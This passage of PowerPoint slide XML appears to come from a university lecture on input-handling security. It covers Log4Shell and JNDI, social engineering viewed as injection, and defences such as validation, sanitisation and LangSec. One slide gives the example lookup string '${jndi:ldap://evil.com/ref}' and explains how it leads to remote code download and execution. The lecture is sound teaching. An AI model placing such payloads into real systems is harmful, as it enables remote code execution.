                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742873" lvl="1" indent="-285720" defTabSz="492074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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1361" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4084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8086672" cy="989361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memory corruption, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection attacks, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access control / authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008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1196752"/>
            <a:ext cx="4030290" cy="5112568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C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-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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t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q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>u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00800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g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y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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C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F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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008000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rgbClr val="008000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00800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1124744"/>
            <a:ext cx="4034606" cy="5040560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m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF99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o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p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r 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s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008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c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o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00800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 o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00800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 X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>M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008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a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y 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c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 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X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v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>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr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y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312E1EBE-BC53-B26A-777E-87A6DAE3B69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9538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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCB8E39A-D565-0FEE-4BB2-37EB77D0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48D8E-6A84-C4B2-C149-96589B1D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600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> van </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cooten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>chvancooten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, https://twitter.com/chvancooten/status/1469340927923826691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3188" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62B015F0-4A09-2CC7-7F61-0E3FEE37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E43263B4-33DF-4CFA-9BD7-953625D303B5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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1361"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="93189" name="Afbeelding 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A80C6110-6D77-BCAA-BFCB-24A3C3CC3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" y="1044361"/>
            <a:ext cx="3189600" cy="25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Afbeelding 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{354FDFCB-144A-4E78-F5EA-B974782B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21" y="4425481"/>
            <a:ext cx="4792320" cy="6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Afbeelding 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{832D15B1-BCB3-CB3A-ABB0-7FE1F329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01" y="1269001"/>
            <a:ext cx="4638240" cy="18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92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078F5590-5FDB-3205-7194-A13AF95A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JNDI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000"/>
              <a:t>(Java Naming and Directory Interface)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55DEB-FB5E-B829-1194-380CBCC3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633" dirty="0"/>
              <a:t>Common interface to interact with a variety of naming and directory services, incl. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CORBA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Naming service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associates names with values aka bindings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provides lookup and search operations of objects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Directory service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special type of naming service for storing directory objects that can have attributes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/>
              <a:t>You can store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Java objects </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0"/>
              <a:t>in Naming or Directory service using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</a:rPr>
              <a:t>serialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. store byte representation of object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</a:rPr>
              <a:t>JNDI references, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. tell where to fetch the object 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  <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rmi://server.com/reference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  <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ldap://server.com/reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514297" lvl="1" indent="0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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Another option is to let a JDNI reference point to a (remote) factory class to create the object.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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4212" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82663BF7-6496-E64C-0389-EE5EBEFC3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7F6D133-7A38-4DB0-9EBB-7FFE3DDAF961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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1361"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26355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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F4F94BC-F2E2-F1D0-6F5F-83F21B7B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B58EA-638D-61AA-42E0-89CDAF9A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en-GB" sz="1800" dirty="0"/>
              <a:t>Attacker provides some input that is a JDNI lookup pointing to their own server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 ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>jndi:ldap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://evil.com/ref}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>If that user input is logged, Log4j will retrieve the corresponding object from the attacker’s server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Attacker’s server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> can reply with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>a serialised object, which will be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>deserialised</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>a JNDI reference to another server hosting the class; JDNI looks up that reference, and downloads &amp; executes class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400008">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Attacker’s code runs on the victim’s machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114288" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>Alternatively, attacker can abuse gadgets available on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>ClassPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> on the victim’s machine.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457153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95236" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEC7382F-6DCE-EC8F-C2A2-83C6E8781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BF3F69A1-0589-43B5-975A-C4F31B7C5761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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1361"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3125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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51075B6A-B833-1494-02AB-608E75188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data exfiltration using Log4J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AB7C84-5C4F-CCE8-C00B-69D2EF5A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16361"/>
            <a:ext cx="7760160" cy="5264640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sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>https://news.sophos.com/en-us/2021/12/12/log4shell-hell-anatomy-of-an-exploit-outbreak/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96260" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2E7FDA3-7B79-CC3C-8FAC-2F3460D08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A54E663E-8669-4353-BCC1-86308E23D0AC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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1361"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="96261" name="Afbeelding 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{667BA64E-FFC3-B4C3-377E-E8A16C10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1" y="1269001"/>
            <a:ext cx="8003520" cy="450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3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Social Engineering as injection attacks?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forms of social engineering can be regarded as injection attacks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Attackers trick victims into executing some command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34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068959"/>
            <a:ext cx="2441399" cy="3049173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 bwMode="auto">
          <a:xfrm>
            <a:off x="4885927" y="3212976"/>
            <a:ext cx="2736304" cy="1656184"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -63172"/>
              <a:gd name="adj2" fmla="val 4562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Grant me    a thousand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wishes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18215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3200" dirty="0"/>
              <a:t>Preventing  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="7200" baseline="-25000" dirty="0"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C0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/>
              <a:t>problems</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:b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38893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4A0-75B2-981E-4B14-8445E04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Why so many &amp; such tricky input problems?</a:t>
            </a:r>
            <a:endParaRPr lang="en-N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DF4-CA53-5465-78FD-75E3C5B6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24745"/>
            <a:ext cx="7997401" cy="4960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Many</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> input languages and formats  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="777611" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>incl. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data formats </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(URLs, filenames, email addresses, X509, ...),  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protocols </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. in network stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(4G, Bluetooth, TCP/IP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, TLS, HTTP, ...), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file formats </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(Word, PDF, HTML, audio/video formats, JSON, XML,  ....), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script/programming languages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(SQL, OS commands, JavaScript, ...), ...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Complex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> input languages and formats </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="777611" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>e.g. look at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>https://html.spec.whatwg.org for HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>or                            https://url.spec.whatwg.org and https://www.rfc-editor.org/rfc/rfc3987 for URLs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Sloppy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definitions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> of input languages and formats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Expressive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> languages and formats  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="777611" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>eg.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>macros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> in Office formats, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>  for Windows file names, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>  in HTML &amp; PDF, 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eval()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>in programming languages, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Some of these factors also explain the success of fuzzing.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E96FD-4C0D-BF9B-F004-A638179DF66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36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517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 Audience poll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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How should you defend against input problems?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Possibly by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="5715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Probably NOT by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sanitisation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="5715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r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It’s a common misunderstanding to think that input validation and input sanitisation are the best or only defences ! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="5715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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It’s an even more common mistake to confuse sanitisation &amp; validation!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="5715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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6246813"/>
            <a:ext cx="3803650" cy="469900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738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7EA-B3BF-41C3-6675-318497A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Preventing input handling problems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A034-1C9B-84A6-E1D2-0618164E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sz="1800" dirty="0"/>
              <a:t>Basic protection primitives: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="414726" lvl="1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       Validation, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sanitisation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Canonicalisation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="814776" lvl="1" indent="-40005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451891" indent="-400050">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tackling buggy parsing with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LangSec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="339933"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="451891" indent="-40005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451891" indent="-400050">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How (not) to tackle unintended parsing - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> injection flaws</a:t>
            </a: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Input vs output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sanitisation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="339933"/>
              </a:solidFill>
            </a:endParaRP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Taint Tracking </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="757626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39933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Safe builders 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Case study: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="414726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394741" indent="-34290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394741" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanU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414726" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="5184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13952-1B0F-53CC-9237-96FB08553669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38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756953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The three basic protection mechanisms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err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
